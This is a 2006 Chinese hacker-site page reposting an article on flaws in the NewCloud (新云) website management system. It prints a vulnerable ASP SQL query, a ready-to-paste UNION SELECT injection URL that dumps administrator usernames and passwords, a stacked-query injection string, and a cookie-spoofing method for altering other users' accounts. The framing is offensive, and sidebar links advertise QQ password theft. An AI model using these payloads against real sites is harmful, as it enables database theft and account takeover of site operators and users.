设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 漏洞利用 -> 文章内容 [站内搜索]  

 
新云网站管理系统文件注入漏洞
作者:不详  来源:转载  发布时间:2006-12-12 13:38:19  发布人:heigeheapao

关于新云

新云网络成立于2002年,是一家提供现代网络服务、软件开发的网络公司,主要从事网络应用软件开发、电子商务系统开发,程序订制、网站开发、网站策划、域名注册、空间租用等多项业务,为企业打造卓越的网络应用平台。

漏洞原理

利用各种方法实现入侵,如COOKIES、抓包、注入检测等。

1.过滤未全

user\articlepost.asp 文件第333行

Quote 
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,
WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And
 username=’" & Newasp.MemberName & "’ 
And ArticleID=" & Request("ArticleID")

没有任何过滤,只有用户是否有权限发文章的检查。综合代码原理可构造URL语句:

articlepost.asp?ChannelID=1&action=view&ArticleID=1%20union%20select%
201,2,3,4,5,username,password,8,9%20from%20nc_admin

注册后直接在浏览器上输入,就可以爆出管理员的表和代码。

2.新云2.1SQL版注入漏洞

漏洞描述:

动画频道的“动画管理”和“审核管理”,错误类型:

Quote 
Microsoft OLE DB Provider for SQL Server (0x80040E14) 
未能找到存储过程 ’NC_FlashAdminList’。 
/admin/admin_Flash.asp, 第 233 行

可以利用SQL注入方法,手工&工具,这个就不用我教了吧。如:

articlepost.asp?ChannelID=1&action=view&ArticleID=1;--

3.COOKIES欺骗获取管理账号

攻击者只需使用WSockExpert等工具抓包修改资料时的信息,编辑用户名及ID信息后用NC提交即可修改指定的用户信息。

[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

 

 
中华隐士黑客联盟
最新免费在线看的电影网站集绵
免费获得Q币的最新方法
最新QQ空间4.0全屏版效果图!!
本站超级酷的Flash (不看会后悔的..
不用木马,轻松万能偷盗QQ号码
黑客快速入门(强烈推荐)
18岁少女欲6000元卖处女身 救患血..
揭秘远程破解盗窃QQ密码的各种方..
免费二级域名申请
 
国际反病毒大会公布中国十大流氓.. 12-13
病毒杀不死的原因分析及对策 12-13
网络安全重在日常防护 12-13
腾讯无线IM战略将受挫 或面临10%.. 12-13
对恶意软件免疫 微软Vista是否完.. 12-13
反病毒专家谈虚拟机技术 面临两大.. 12-13
做了没人管不做就吃亏 流氓软件何.. 12-13
电邮、QQ聊天可作呈堂证供 电子证.. 12-13
我国软件企业自发成立行业联盟 抵.. 12-13
雅虎举绿色邮箱大旗 应战年终垃圾.. 12-13
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com